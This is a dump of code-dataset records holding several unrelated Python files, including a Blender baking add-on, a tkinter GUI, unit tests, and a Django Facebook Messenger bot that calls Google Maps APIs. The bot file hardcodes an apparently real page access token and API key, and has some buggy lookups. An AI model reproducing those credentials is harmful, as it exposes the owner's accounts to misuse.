bpy.data.objects.get(context.scene.lowpoly) is None and not context.scene.lowpoly in bpy.data.collections:\n self.report({'WARNING'}, \"Select a valid lowpoly object or collection!\")\n return {'FINISHED'}\n if bpy.data.objects.get(context.scene.hipoly) is None and not context.scene.hipoly in bpy.data.collections and not context.scene.UseLowOnly:\n self.report({'WARNING'}, \"Select a valid hipoly object or collection!\")\n return {'FINISHED'}\n if bpy.data.objects.get(context.scene.cage) is None and context.scene.cageEnabled:\n self.report({'WARNING'}, \"Select a valid cage object!\")\n return {'FINISHED'}\n\n\n #test if lowpoly, highpoly and cage objects are actually models\n lowpolymeshes = 0\n if bpy.data.objects.get(context.scene.lowpoly) is None:\n for o in bpy.data.collections[context.scene.lowpoly].objects:\n if o.type == 'MESH':\n lowpolymeshes+=1\n else:\n if bpy.data.objects[context.scene.lowpoly].type == 'MESH':\n lowpolymeshes = 1\n if lowpolymeshes == 0:\n self.report({'WARNING'}, \"lowpoly needs to have a mesh!\")\n return {'FINISHED'} \n \n hipolymeshes = 0\n if bpy.data.objects.get(context.scene.hipoly) is None:\n for o in bpy.data.collections[context.scene.hipoly].objects:\n if o.type == 'MESH':\n hipolymeshes+=1\n else:\n if bpy.data.objects[context.scene.hipoly].type == 'MESH':\n hipolymeshes = 1\n if hipolymeshes == 0:\n self.report({'WARNING'}, \"hipoly needs to have a mesh!\")\n return {'FINISHED'}\n \n if context.scene.cageEnabled and bpy.data.objects[context.scene.cage].type != 'MESH':\n self.report({'WARNING'}, \"cage needs to be a mesh!\")\n return {'FINISHED'}\n\n \n #setup\n\n #1 unhide everything to be baked\n if not context.scene.UseLowOnly:\n unhide(context.scene.hipoly)\n unhide(context.scene.lowpoly)\n bpy.ops.object.hide_view_clear() #temporary until I figure out how hiding is handled\n \n #2 make sure we are in object mode and nothing is selected\n if bpy.context.object.mode == 'EDIT':\n bpy.ops.object.mode_set(mode='OBJECT')\n bpy.ops.object.select_all(action='DESELECT')\n\n #3 setup lowpoly for baking\n lowpolyobject = \"null\"\n orig_lowpoly = None\n\n #if collection, create temporary lowpoly object\n if bpy.data.objects.get(context.scene.lowpoly) is None: \n for o in bpy.data.collections[context.scene.lowpoly].objects:\n if o.type == 'MESH':\n o.hide_viewport = False\n o.select_set(state=True)\n context.view_layer.objects.active = o\n o.hide_render = True\n #duplicate selected and combine into new object\n bpy.ops.object.duplicate()\n bpy.ops.object.join()\n bpy.ops.object.transform_apply(location=False, rotation=True, scale=True)\n lowpolyobject = bpy.context.selected_objects[0].name\n bpy.data.objects[lowpolyobject].hide_render = False\n else:\n bpy.data.objects[context.scene.lowpoly].hide_viewport = False\n bpy.data.objects[context.scene.lowpoly].hide_render = False\n bpy.data.objects[context.scene.lowpoly].select_set(state=True)\n orig_lowpoly = bpy.data.objects[context.scene.lowpoly]\n lowpolyobject = context.scene.lowpoly\n\n #4 test if lowpoly has a material and UV\n if len(bpy.data.objects[lowpolyobject].data.materials) == 0:\n if context.scene.lowpolyGroup:\n bpy.ops.object.select_all(action='DESELECT')\n bpy.data.objects[lowpolyobject].select_set(state=True)\n bpy.ops.object.delete(use_global=False)\n self.report({'WARNING'}, \"Material required on low poly mesh!\")\n return {'FINISHED'}\n\n if len(bpy.data.objects[lowpolyobject].data.uv_layers) == 0:\n if context.scene.lowpolyGroup:\n bpy.ops.object.select_all(action='DESELECT')\n bpy.data.objects[lowpolyobject].select_set(state=True)\n bpy.ops.object.delete(use_global=False)\n self.report({'WARNING'}, \"low poly mesh has no UV!\")\n return {'FINISHED'}\n\n #5 remember render engine and switch to CYCLES for baking\n orig_renderer = bpy.data.scenes[bpy.context.scene.name].render.engine\n bpy.data.scenes[bpy.context.scene.name].render.engine = \"CYCLES\"\n\n #6 create temporary bake image and material\n bakeimage = bpy.data.images.new(\"BakeImage\", width=context.scene.bakeWidth, height=context.scene.bakeHeight)\n bakemat = bpy.data.materials.new(name=\"bakemat\")\n bakemat.use_nodes = True\n\n #7 select hipoly target\n if not context.scene.UseLowOnly:\n #select hipoly object or collection:\n if bpy.data.objects.get(context.scene.hipoly) is None:\n for o in bpy.data.collections[context.scene.hipoly].objects:\n if o.type == 'MESH':\n o.hide_viewport = False\n o.hide_render = False\n o.select_set(state=True)\n else:\n bpy.data.objects[context.scene.hipoly].hide_viewport = False\n bpy.data.objects[context.scene.hipoly].hide_render = False\n bpy.data.objects[context.scene.hipoly].select_set(state=True)\n\n #8 select lowpoly target\n bpy.context.view_layer.objects.active = bpy.data.objects[lowpolyobject]\n\n #9 select lowpoly material and create temporary render target\n orig_mat = bpy.context.active_object.data.materials[0]\n bpy.context.active_object.data.materials[0] = bakemat\n node_tree = bakemat.node_tree\n node = node_tree.nodes.new(\"ShaderNodeTexImage\")\n node.select = True\n node_tree.nodes.active = node\n node.image = bakeimage\n\n #10 check if theres a cage to be used\n if context.scene.cageEnabled:\n bpy.context.scene.render.bake.use_cage = True\n bpy.context.scene.render.bake.cage_object = bpy.data.objects[context.scene.cage]\n else:\n bpy.context.scene.render.bake.use_cage = False\n\n\n\n\n\n\n\n\n #11 bake all maps!\n if context.scene.bakeNormal and not context.scene.UseLowOnly:\n\n bpy.context.scene.cycles.samples = context.scene.samplesNormal\n bpy.ops.object.bake(type='NORMAL', use_clear=True, use_selected_to_active=True, normal_space='TANGENT')\n\n bakeimage.filepath_raw = context.scene.bakeFolder+context.scene.bakePrefix+\"_normal.tga\"\n bakeimage.file_format = 'TARGA'\n bakeimage.save()\n \n if context.scene.bakeObject and not context.scene.UseLowOnly:\n\n bpy.context.scene.cycles.samples = context.scene.samplesObject\n\n bpy.ops.object.bake(type='NORMAL', use_clear=True, use_selected_to_active=True, normal_space='OBJECT')\n\n bakeimage.filepath_raw = context.scene.bakeFolder+context.scene.bakePrefix+\"_object.tga\"\n bakeimage.file_format = 'TARGA'\n bakeimage.save()\n\n if context.scene.bakeAO:\n\n bpy.context.scene.cycles.samples = context.scene.samplesAO\n\n bpy.ops.object.bake(type='AO', use_clear=True, use_selected_to_active=not context.scene.UseLowOnly)\n\n bakeimage.filepath_raw = context.scene.bakeFolder+context.scene.bakePrefix+\"_ao.tga\"\n bakeimage.file_format = 'TARGA'\n bakeimage.save()\n\n if context.scene.bakeColor and not context.scene.UseLowOnly:\n\n bpy.context.scene.cycles.samples = context.scene.samplesColor\n bpy.context.scene.render.bake.use_pass_direct = False\n bpy.context.scene.render.bake.use_pass_indirect = False\n bpy.context.scene.render.bake.use_pass_color = True\n\n bpy.ops.object.bake(type='DIFFUSE', use_clear=True, use_selected_to_active=True)\n\n bakeimage.filepath_raw = context.scene.bakeFolder+context.scene.bakePrefix+\"_color.tga\"\n bakeimage.file_format = 'TARGA'\n bakeimage.save()\n \n if context.scene.bakeRoughness and not context.scene.UseLowOnly:\n\n bpy.context.scene.cycles.samples = context.scene.samplesRoughness\n\n bpy.ops.object.bake(type='ROUGHNESS', use_clear=True, use_selected_to_active=True)\n\n bakeimage.filepath_raw = context.scene.bakeFolder+context.scene.bakePrefix+\"_roughness.tga\"\n bakeimage.file_format = 'TARGA'\n bakeimage.save()\n\n #UV SNAPSHOT\n if context.scene.bakeUV:\n bpy.ops.object.editmode_toggle()\n bpy.ops.mesh.select_all(action='SELECT')\n bpy.ops.object.editmode_toggle()\n original_type = bpy.context.area.type\n bpy.context.area.type = \"IMAGE_EDITOR\"\n uvfilepath = context.scene.bakeFolder+context.scene.bakePrefix+\"_uv.png\"\n bpy.ops.uv.export_layout(filepath=uvfilepath, size=(context.scene.bakeWidth, context.scene.bakeHeight))\n bpy.context.area.type = original_type\n\n\n\n\n\n\n #cleanup temporary objects and materials\n bpy.ops.object.select_all(action='DESELECT')\n if not context.scene.lowpolyGroup:\n orig_lowpoly.select_set(state=True)\n bpy.data.images.remove(bakeimage)\n bakemat.node_tree.nodes.remove(node)\n bpy.data.materials.remove(bakemat)\n bpy.context.active_object.data.materials[0] = orig_mat\n bpy.data.scenes[bpy.context.scene.name].render.engine = orig_renderer\n\n if context.scene.lowpolyGroup:\n bpy.ops.object.select_all(action='DESELECT')\n bpy.data.objects[lowpolyobject].select_set(state=True)\n bpy.ops.object.delete(use_global=False)\n\n #reload all textures\n for image in bpy.data.images:\n image.reload()\n\n #rehide back to original state \n if context.scene.lowpolyActive is True:\n if bpy.data.objects.get(context.scene.lowpoly) is None:\n for o in bpy.data.collections[context.scene.lowpoly].objects:\n o.hide_viewport = False\n context.view_layer.objects.active = o\n else:\n bpy.data.objects[context.scene.lowpoly].hide_viewport = False\n context.view_layer.objects.active = bpy.data.objects[context.scene.lowpoly]\n else:\n if bpy.data.objects.get(context.scene.lowpoly) is None:\n for o in bpy.data.collections[context.scene.lowpoly].objects:\n o.hide_viewport = True\n else:\n bpy.data.objects[context.scene.lowpoly].hide_viewport = True\n\n if not context.scene.UseLowOnly:\n if context.scene.hipolyActive is True:\n if bpy.data.objects.get(context.scene.hipoly) is None:\n for o in bpy.data.collections[context.scene.hipoly].objects:\n o.hide_viewport = False\n context.view_layer.objects.active = o\n else:\n bpy.data.objects[context.scene.hipoly].hide_viewport = False\n context.view_layer.objects.active = bpy.data.objects[context.scene.hipoly]\n else:\n if bpy.data.objects.get(context.scene.hipoly) is None:\n for o in bpy.data.collections[context.scene.hipoly].objects:\n o.hide_viewport = True\n else:\n bpy.data.objects[context.scene.hipoly].hide_viewport = True\n\n return {'FINISHED'}\n\n\n\n\n\n\n\n\n\n\n\n\n\n\ndef register():\n bpy.utils.register_class(BRM_Bake)\n bpy.utils.register_class(BRM_BakeUIHide)\n bpy.utils.register_class(BRM_BakeUIPanel)\n bpy.utils.register_class(BRM_BakeUIToggle)\n bpy.utils.register_class(BRM_BakeUIIncrement)\n\n bpy.types.Scene.lowpoly = bpy.props.StringProperty (\n name = \"lowpoly\",\n default = \"lowpoly\",\n description = \"lowpoly object\",\n )\n bpy.types.Scene.lowpolyActive = bpy.props.BoolProperty (\n name = \"lowpolyActive\",\n default = True,\n description = \"lowpolyActive\",\n )\n bpy.types.Scene.lowpolyGroup = bpy.props.BoolProperty (\n name = \"lowpolyGroup\",\n default = False,\n description = \"enable lowpoly collection\",\n )\n bpy.types.Scene.hipoly = bpy.props.StringProperty (\n name = \"hipoly\",\n default = \"hipoly\",\n description = \"hipoly object or group\",\n )\n bpy.types.Scene.hipolyActive = bpy.props.BoolProperty (\n name = \"hipolyActive\",\n default = True,\n description = \"hipolyActive\",\n )\n bpy.types.Scene.hipolyGroup = bpy.props.BoolProperty (\n name = \"hipolyGroup\",\n default = False,\n description = \"enable hipoly collection\",\n )\n bpy.types.Scene.cage = bpy.props.StringProperty (\n name = \"cage\",\n default = \"cage\",\n description = \"cage object\",\n )\n bpy.types.Scene.cageActive = bpy.props.BoolProperty (\n name = \"cageActive\",\n default = True,\n description = \"cageActive\",\n )\n bpy.types.Scene.cageEnabled = bpy.props.BoolProperty (\n name = \"cageEnabled\",\n default = False,\n description = \"Enable cage object for baking\",\n )\n bpy.types.Scene.bakeNormal = bpy.props.BoolProperty (\n name = \"bakeNormal\",\n default = False,\n description = \"Bake Tangent Space Normal Map\",\n )\n bpy.types.Scene.bakeObject = bpy.props.BoolProperty (\n name = \"bakeObject\",\n default = False,\n description = \"Bake Object Space Normal Map\",\n )\n bpy.types.Scene.bakeAO = bpy.props.BoolProperty (\n name = \"bakeAO\",\n default = False,\n description = \"Bake Ambient Occlusion Map\",\n )\n bpy.types.Scene.bakeColor = bpy.props.BoolProperty (\n name = \"bakeColor\",\n default = False,\n description = \"Bake Albedo Color Map\",\n )\n bpy.types.Scene.bakeRoughness = bpy.props.BoolProperty (\n name = \"bakeRoughness\",\n default = False,\n description = \"Bake Roughness Map\",\n )\n bpy.types.Scene.bakeUV = bpy.props.BoolProperty (\n name = \"bakeUV\",\n default = False,\n description = \"Bake UV Wireframe Snapshot of Lowpoly Mesh\",\n )\n bpy.types.Scene.samplesNormal = bpy.props.IntProperty (\n name = \"samplesNormal\",\n default = 8,\n description = \"Tangent Space Normal Map Sample Count\",\n )\n bpy.types.Scene.samplesObject = bpy.props.IntProperty (\n name = \"samplesObject\",\n default = 8,\n description = \"Object Space Normal Map Sample Count\",\n )\n bpy.types.Scene.samplesAO = bpy.props.IntProperty (\n name = \"samplesAO\",\n default = 128,\n description = \"Ambient Occlusion Map Sample Count\",\n )\n bpy.types.Scene.samplesColor = bpy.props.IntProperty (\n name = \"samplesColor\",\n default = 1,\n description = \"samplesColor\",\n )\n bpy.types.Scene.samplesRoughness = bpy.props.IntProperty (\n name = \"samplesRoughness\",\n default = 1,\n description = \"samplesRoughness\",\n )\n bpy.types.Scene.bakeWidth = bpy.props.IntProperty (\n name = \"bakeWidth\",\n default = 512,\n description = \"Export Texture Width\",\n ) \n bpy.types.Scene.bakeHeight = bpy.props.IntProperty (\n name = \"bakeHeight\",\n default = 512,\n description = \"Export Texture Height\",\n )\n bpy.types.Scene.bakePrefix = bpy.props.StringProperty (\n name = \"bakePrefix\",\n default = \"export\",\n description = \"export filename\",\n )\n bpy.types.Scene.bakeFolder = bpy.props.StringProperty (\n name = \"bakeFolder\",\n default = \"destination folder\",\n description = \"destination folder\",\n subtype = 'DIR_PATH'\n )\n bpy.types.Scene.UseBlenderGame = bpy.props.BoolProperty (\n name = \"UseBlenderGame\",\n default = True,\n description = \"Use Blender Game for lowpoly display\",\n )\n bpy.types.Scene.UseLowOnly = bpy.props.BoolProperty (\n name = \"UseLowOnly\",\n default = False,\n description = \"Only bake lowpoly on itself\",\n )\n\ndef unregister():\n bpy.utils.unregister_class(BRM_Bake)\n bpy.utils.unregister_class(BRM_BakeUIHide)\n bpy.utils.unregister_class(BRM_BakeUIPanel)\n bpy.utils.unregister_class(BRM_BakeUIToggle)\n bpy.utils.unregister_class(BRM_BakeUIIncrement)\n\n del bpy.types.Scene.lowpoly\n del bpy.types.Scene.lowpolyActive\n del bpy.types.Scene.hipoly\n del bpy.types.Scene.hipolyActive\n del bpy.types.Scene.cage\n del bpy.types.Scene.cageActive\n del bpy.types.Scene.cageEnabled\n del bpy.types.Scene.bakeNormal\n del bpy.types.Scene.bakeObject\n del bpy.types.Scene.bakeAO\n del bpy.types.Scene.bakeColor\n del bpy.types.Scene.bakeRoughness\n del bpy.types.Scene.bakeUV\n del bpy.types.Scene.samplesNormal\n del bpy.types.Scene.samplesAO\n del bpy.types.Scene.samplesColor\n del bpy.types.Scene.samplesRoughness\n del bpy.types.Scene.samplesObject\n del bpy.types.Scene.bakeWidth\n del bpy.types.Scene.bakeHeight\n del bpy.types.Scene.bakeFolder\n del bpy.types.Scene.UseBlenderGame\n del bpy.types.Scene.UseLowOnly\n \nif __name__ == \"__main__\":\n register()\n","sub_path":"BRM_BakeUI.py","file_name":"BRM_BakeUI.py","file_ext":"py","file_size_in_byte":28439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"282509383","text":"from django import forms\n\n\nclass InputAutomata(forms.Form):\n text = forms.CharField(label='Post:', max_length=2000,\n widget=forms.Textarea(attrs={'rows': '10', 'cols': '50'}))\n file = forms.FileField()\n\n\nclass InputWord(forms.Form):\n word = forms.CharField()\n\n\nclass InputInt(forms.Form):\n number = forms.IntegerField(max_value=5, min_value=1)\n","sub_path":"mysite/automata/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"67940523","text":"from tkinter import *\n#from tkinter.ttk import *\nfrom tkinter import scrolledtext\nfrom tkinter import Menu\n\nwindow = Tk()\n\nwindow.title(\"SEARCH@gs_ANYTHING HERE\")\nwindow.geometry('700x300')\n\ntxt = scrolledtext.ScrolledText(window, width=40, height=10)\n\ntxt.grid(column=25, row=100)\n\nlbl = Label (window, text=\"www.GUNJAN.in\", font=(\"Times new Roman\", 40))\n\nlbl.grid(column=25, row=25)\n\ntxt = Entry(window, width=100)\n\ntxt.grid(column=25, row=50)\n\n\ndef clicked():\n lbl.configure(text=\"Request is Applied !!\",font=(\"Times new Roman\",10))\n lbl.grid(column=10,row=75)\n\nbtn = Button(window, text=\"Gunjan_Search\", bg='White', fg='Black',command=clicked)\n\nbtn.grid(column=25, row=75)\n\n# Creating a photoimage object to use image \nphoto = PhotoImage(file = r\"C:\\mr\\gunu.png\") \n\n# Resizing image to fit on button \nphotoimage = photo.subsample(20,20) \n\n# here, image option is used to \n# set image on button \n# compound option is used to align \n# image on LEFT side of button \nbtn2=Button(window, text = 'MIKE', image = photoimage, \n\t\t\t\t\tcompound = LEFT) \nbtn2.grid(column=50,row=50)\n#mainloop() \n\n\nmenu = Menu(window)\n\nnew_item = Menu(menu)\nnew_item1 = Menu(menu)\nnew_item2 = Menu(menu)\nnew_item3 = Menu(menu)\n\nnew_item.add_command(label='Images')\nnew_item.add_separator()\nnew_item.add_command(label='HIstroy')\nnew_item.add_separator()\nnew_item.add_command(label='new_ignotic tab')\nnew_item.add_separator()\nnew_item.add_command(label='help')\nnew_item.add_separator()\nnew_item.add_command(label='more tools')\nnew_item.add_separator()\nnew_item.add_command(label='Zoom - & +')\nnew_item.add_separator()\nnew_item.add_command(label='setting')\nnew_item.add_separator()\nnew_item.add_command(label='Exit')\nnew_item.add_separator()\nnew_item1.add_command(label='version 1.0')\nnew_item1.add_separator()\nnew_item2.add_command(label='MY GUNU IMAGE')\nnew_item2.add_separator()\nnew_item2.add_command(label='MY GUNU TUBE')\nnew_item2.add_separator()\nnew_item2.add_command(label='MPG PROGRAMMING')\nnew_item2.add_separator()\nnew_item3.add_command(label='gunjanshrimali1234@gmail.com')\nnew_item3.add_separator()\nnew_item3.add_command(label='gunjanshrimali407@gmail.com')\nnew_item3.add_separator()\nnew_item3.add_command(label='mpgsite09@gmail.com')\n\nmenu.add_cascade(label='Menu', menu=new_item)\nmenu.add_cascade(label='Gmail', menu=new_item3)\nmenu.add_cascade(label='GUNJAN APP', menu=new_item2)\nmenu.add_cascade(label='SIGN UP', menu=new_item1)\n\nwindow.config(menu=menu)\n\nwindow.mainloop()\n","sub_path":"front.py","file_name":"front.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"97074238","text":"import unittest\nimport numpy as np\n\nfrom pele.thermodynamics import get_thermodynamic_information\n\n\nfrom sens._sens_exact import NestedSamplingSAExact\nfrom sens import get_all_normalmodes\nfrom sens.models._lj_tools import LJClusterSENS\n\nimport _test_ns_lj\n\nclass TestSENSExact_LJ(_test_ns_lj.TestNS_LJ):\n def setUp(self):\n# self.seed = 4\n# np.random.seed(self.seed)\n self.setUp1()\n \n def set_up_system(self):\n self.natoms = 6\n self.gmin = -12.7121\n self.system = LJClusterSENS(self.natoms, 2.5)\n self.ndof = 3*self.natoms - 6\n\n\n def setUp1(self, nproc=1):\n self.set_up_system()\n self.nreplicas = 10\n self.stepsize = 0.01\n self.nproc = nproc\n \n self.database = self.system.create_database()\n # add some minima to the database\n bh = self.system.get_basinhopping(self.database, outstream=None)\n while self.database.number_of_minima() < 2:\n bh.run(1)\n # compute the thermodynamic information\n get_thermodynamic_information(self.system, self.database)\n get_all_normalmodes(self.system, self.database)\n \n\n self.minima = list(self.database.minima())\n assert self.database.number_of_minima() > 1, \"%d minima\" % self.database.number_of_minima()\n \n self.mc_runner = self.system.get_mc_walker(mciter=200)\n\n self.energy_accuracy = 1e-4\n self.ns = NestedSamplingSAExact(self.system, self.nreplicas, self.mc_runner,\n self.minima, self.energy_accuracy, \n mindist=self.system.get_mindist(),\n config_tests = self.system.get_config_tests(),\n stepsize=0.1, nproc=nproc, verbose=True, iprint=100)\n \n self.Emax0 = self.ns.replicas[-1].energy\n \n self.run_ns(max_iter=1000, Etol=.001)\n \n\n \n def test1(self):\n super(TestSENSExact_LJ, self).test1()\n self.assertGreater(self.ns.count_sampled_minima, 0)\n \n# T, cv = self.compute_cv()\n# import matplotlib.pyplot as plt\n## plt.plot(cv)\n# print cv.shape\n# plt.plot(T, cv)\n# plt.show()\n \n \n \n\nclass TestSENSExact_LJ_Par(TestSENSExact_LJ):\n def setUp(self):\n self.setUp1(nproc=3)\n \n \nif __name__ == \"__main__\":\n unittest.main() \n","sub_path":"sens/tests/_test_sens_exact_lj.py","file_name":"_test_sens_exact_lj.py","file_ext":"py","file_size_in_byte":2430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"93694453","text":"from django.shortcuts import render\r\nfrom django.views import generic\r\nfrom django.http.response import HttpResponse\r\nfrom django.utils.decorators import method_decorator\r\nfrom django.views.decorators.csrf import csrf_exempt\r\nfrom chatterbot import ChatBot\r\nfrom chatterbot.trainers import ChatterBotCorpusTrainer\r\nfrom hanziconv import HanziConv\r\nfrom django.conf import settings\r\nfrom urllib.parse import quote\r\nimport json, requests, re, random, os, sys, string\r\nimport jieba, jieba.posseg , jieba.analyse\r\nimport urllib.request\r\n\r\n\r\n# 胖狗狗的白白肚肚 https://goo.gl/WEjQQK API\r\nPAGE_ACCESS_TOKEN = \"EAAB09UKvWGsBAFsrGU5hpRfJRQHMFPMSHNV8D9TvIKpqvhLkkKCUJgIhJHQZABsqadPckRxeBxsadZAq6RSMeBHdskcwP0hnLyKEoWsWXCQWx1hrrXZAz6PXeKQnTkYpPOhPoFJtDXf3z60U6N6PlBl9ZBXAnJWlM03ZBl9JqhAZDZD\"\r\nGM_API_KEY = 'AIzaSyA35lPzOmBYaGtsGnu1BtuZiWqZcLpYdQk'\r\n\r\n\r\nclass GMBotView(generic.View):\r\n\t\t# 在class based views 里面,args 有两个元素,一个是self, 第二个才是request\r\n\t\t# *args是接受很多的值,在Python叫做tuple。\r\n\t\t# **kwargs是接受dictionary。\r\n\r\n def get(self, request, *args, **kwargs):\r\n \t# Verify Token = botprojecttest\r\n \tif self.request.GET['hub.verify_token'] == 'botprojecttest':\r\n \t\treturn HttpResponse(self.request.GET['hub.challenge'])\r\n \telse:\r\n \t\treturn HttpResponse('Error, invalid token')\r\n\r\n\t# The get method is the same as before.. omitted here for brevity\r\n @method_decorator(csrf_exempt)\r\n def dispatch(self, request, *args, **kwargs):\r\n return generic.View.dispatch(self, request, *args, **kwargs)\r\n\r\n # Post function to handle Facebook messages\r\n # 將接收到的文字內容以Json形式讀取,而後轉為字串\r\n def post(self, request, *args, **kwargs):\r\n # Converts the text payload into a python dictionary\r\n incoming_message = json.loads(self.request.body.decode('utf-8'))\r\n # Facebook recommends going through every entry since they might send\r\n # multiple messages in a single call during high load\r\n for entry in incoming_message['entry']:\r\n for message in entry['messaging']:\r\n # Check to make sure the received call is a message call\r\n # This might be delivery, optin, postback for other events \r\n if 'message' in message:\r\n # Print the message to the terminal\r\n\r\n if 'text' in message ['message']:\r\n\r\n # Assuming the sender only sends text. Non-text messages like stickers, audio, pictures\r\n # are sent as attachments and must be handled accordingly. \r\n post_facebook_message_text(message['sender']['id'], message['message']['text']) \r\n \r\n\r\n return HttpResponse()\r\n\r\n\r\ndef message_contents(fbid, sentence):\r\n \r\n # recevied_message = \"\"\r\n post_message_url = 'https://graph.facebook.com/v2.6/me/messages?access_token=%s'%PAGE_ACCESS_TOKEN\r\n \r\n\r\n # print(\"===========\" + sentence + \"=================\")\r\n # GM_id = GMap_place_idsearch(sentence)\r\n # print(\"===========\" + GM_id + \"=================\")\r\n # response_msg = json.dumps({\"recipient\":{\"id\":fbid},\"message\":{\"text\":GMap_place_detailssearch(GM_id)[2]}})\r\n # response_msg = json.dumps({\"recipient\":{\"id\":fbid},\"message\":{\"text\":GMap_place_detailssearch(sentence)[2]}})\r\n response_msg = json.dumps({\"recipient\":{\"id\":fbid},\"message\":{\"text\":\"輸入的文字為:\" + sentence}})\r\n \r\n status = requests.post(post_message_url, headers = {\"Content-Type\": \"application/json\"}, data = response_msg)\r\n # post_facebook_message_media(fbid, GMap_map(sentence)) \r\n\r\n\r\n\r\n# 建立可回應至FB之函數(文字)\r\ndef post_facebook_message_text(fbid, recevied_message):\r\n\r\n\t# 抓取傳送者名稱\r\n\t# 使用:user_details['first_name']\r\n user_details_url = \"https://graph.facebook.com/v2.6/%s\"%fbid\r\n user_details_params = {'fields':'first_name,last_name,profile_pic', 'access_token':PAGE_ACCESS_TOKEN}\r\n user_details = requests.get(user_details_url, user_details_params).json()\r\n\r\n message_contents(fbid, recevied_message)\r\n\r\n\r\ndef post_facebook_message_media(fbid, imgurl):\r\n post_message_url = 'https://graph.facebook.com/v2.6/me/messages?access_token=%s'%PAGE_ACCESS_TOKEN\r\n response_msg = json.dumps({\"recipient\":{\"id\":fbid}, \"message\":{\"attachment\":{\"type\":\"image\", \"payload\":{\"url\":imgurl}}}})\r\n status = requests.post(post_message_url, headers = {\"Content-Type\": \"application/json\"},data = response_msg)\r\n # print(status.json())\r\n\r\n# Google Static Maps\r\ndef GMap_map(center):\r\n\r\n endpoint = \"https://maps.googleapis.com/maps/api/staticmap?\"\r\n GM_API_KEY = 'AIzaSyA35lPzOmBYaGtsGnu1BtuZiWqZcLpYdQk'\r\n\r\n G_center = center.replace(' ', '+')\r\n G_zoom = \"16\"\r\n G_size = \"250x250\"\r\n G_markers = \"color:red%7C\"+ G_center\r\n\r\n nav_request = 'center={}&zoom={}&size={}&markers={}&key={}'.format(G_center, G_zoom, G_size, G_markers, GM_API_KEY)\r\n G_request = endpoint + nav_request\r\n return G_request\r\n\r\n\r\n# Google Places API Web Service Search\r\ndef GMap_place_idsearch(center):\r\n\r\n endpoint = \"https://maps.googleapis.com/maps/api/place/textsearch/json?\"\r\n GM_API_KEY = 'AIzaSyA35lPzOmBYaGtsGnu1BtuZiWqZcLpYdQk'\r\n\r\n G_query = center.replace(' ', '+')\r\n G_language = 'zh-TW'\r\n\r\n nav_request = 'query={}&language={}&key={}'.format(G_query, G_language, GM_API_KEY)\r\n\r\n request = endpoint + nav_request\r\n # url中不可包含中文等無法處理之字→需轉換成「%XX」\r\n # urllib.parse.quote(string, safe='/', encoding=None, errors=None)\r\n # https://www.zhihu.com/question/22899135 https://docs.python.org/3/library/urllib.parse.html#url-quoting。 \r\n request_trans = urllib.parse.quote(request, safe = string.printable)\r\n\r\n\r\n # 新增標頭檔偽裝伺服器 (Error:'latin-1' codec can't encode character '\\u015f' in position 54: ordinal not in range(256))\r\n # header = {'user-agent':\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/\\537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36\"}\r\n # req = urllib.request.Request(request_trans, headers = header)\r\n # respone = urllib.request.urlopen(req).read()\r\n\r\n print (request_trans)\r\n\r\n respone = urllib.request.urlopen(request_trans).read()\r\n directions = json.loads(respone.decode('utf-8'))\r\n\r\n results = directions['results']\r\n # response = results[0]['name'] + '的地址是:' + results[0]['formatted_address']\r\n\r\n # print ('===results=====' + results[0])\r\n \r\n response = results[0]['place_id']\r\n\r\n print ('===response===' + response)\r\n\r\n # print (results[0]['name'] + '的地址是:' + results[0]['formatted_address'])\r\n return response\r\n\r\n\r\n# Google Places API Web Service Details\r\ndef GMap_place_detailssearch(query):\r\n \r\n endpoint = \"https://maps.googleapis.com/maps/api/place/details/json?\"\r\n GM_API_KEY = 'AIzaSyA35lPzOmBYaGtsGnu1BtuZiWqZcLpYdQk'\r\n\r\n G_language = 'zh-TW'\r\n nav_request = 'placeid={}&language={}&key={}'.format(query, G_language, GM_API_KEY)\r\n request = endpoint + nav_request\r\n\r\n print(request)\r\n\r\n respone = urllib.request.urlopen(request).read()\r\n directions = json.loads(respone.decode('utf-8'))\r\n\r\n\r\n result = directions['result']\r\n\r\n\r\n # google可抓取類別:名稱、電話、地址、營業時間、評價、網站、googlemap頁面\r\n\r\n P_name = result['name']\r\n\r\n if 'formatted_phone_number' in result :\r\n P_phone = result['formatted_phone_number']\r\n else :\r\n P_phone = '您所查詢的地點暫無電話資訊!'\r\n\r\n if 'formatted_address' in result :\r\n P_address = result['formatted_phone_number']\r\n else :\r\n P_address = '您所查詢的地點暫無地址資訊!'\r\n\r\n # 營業時間回傳值為list\r\n if 'opening_hours' in result :\r\n P_time = ''\r\n for i in range(0,7):\r\n P_time += re['opening_hours']['weekday_text'][i] + '\\n'\r\n else :\r\n P_time = '您所查詢的地點暫無營業時間資訊!'\r\n \r\n if 'rating' in result :\r\n P_grade = result['rating']\r\n else :\r\n P_grade = '您所查詢的地點暫無評價資訊!'\r\n\r\n if 'website' in result :\r\n P_web = result['website']\r\n else :\r\n P_web = '您所查詢的地點暫無網站資訊!'\r\n\r\n P_GMweb = result['url']\r\n\r\n response = [ P_name, P_phone, P_address, P_time, P_grade, P_web, P_GMweb ]\r\n\r\n print (response)\r\n\r\n return response\r\n # return result\r\n","sub_path":"1221 MessengerBot_Googlemap/chatbot/chatbot/Scripts/testbot/GooglemapBot/views - 複製.py","file_name":"views - 複製.py","file_ext":"py","file_size_in_byte":8524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"578776111","text":"# -*- coding: utf-8 -*-\nimport lxml.objectify\nimport pytest\nimport zeit.cms.content.interfaces\nimport zeit.cms.content.sources\nimport zeit.content.video.interfaces\nimport zeit.content.video.testing\nimport zeit.content.video.video\nimport zope.component\n\n\nclass TestVideo(zeit.content.video.testing.TestCase):\n\n def test_security_should_allow_access_to_id_prefix(self):\n import zeit.cms.testing\n import zope.security.management\n from zope.security.proxy import ProxyFactory\n factory = zeit.content.video.testing.video_factory(self)\n factory.next()\n video = factory.next() # in repository\n zope.security.management.endInteraction()\n with zeit.cms.testing.interaction('zope.mgr'):\n proxied = ProxyFactory(video)\n self.assertEqual('vid', proxied.id_prefix)\n\n def 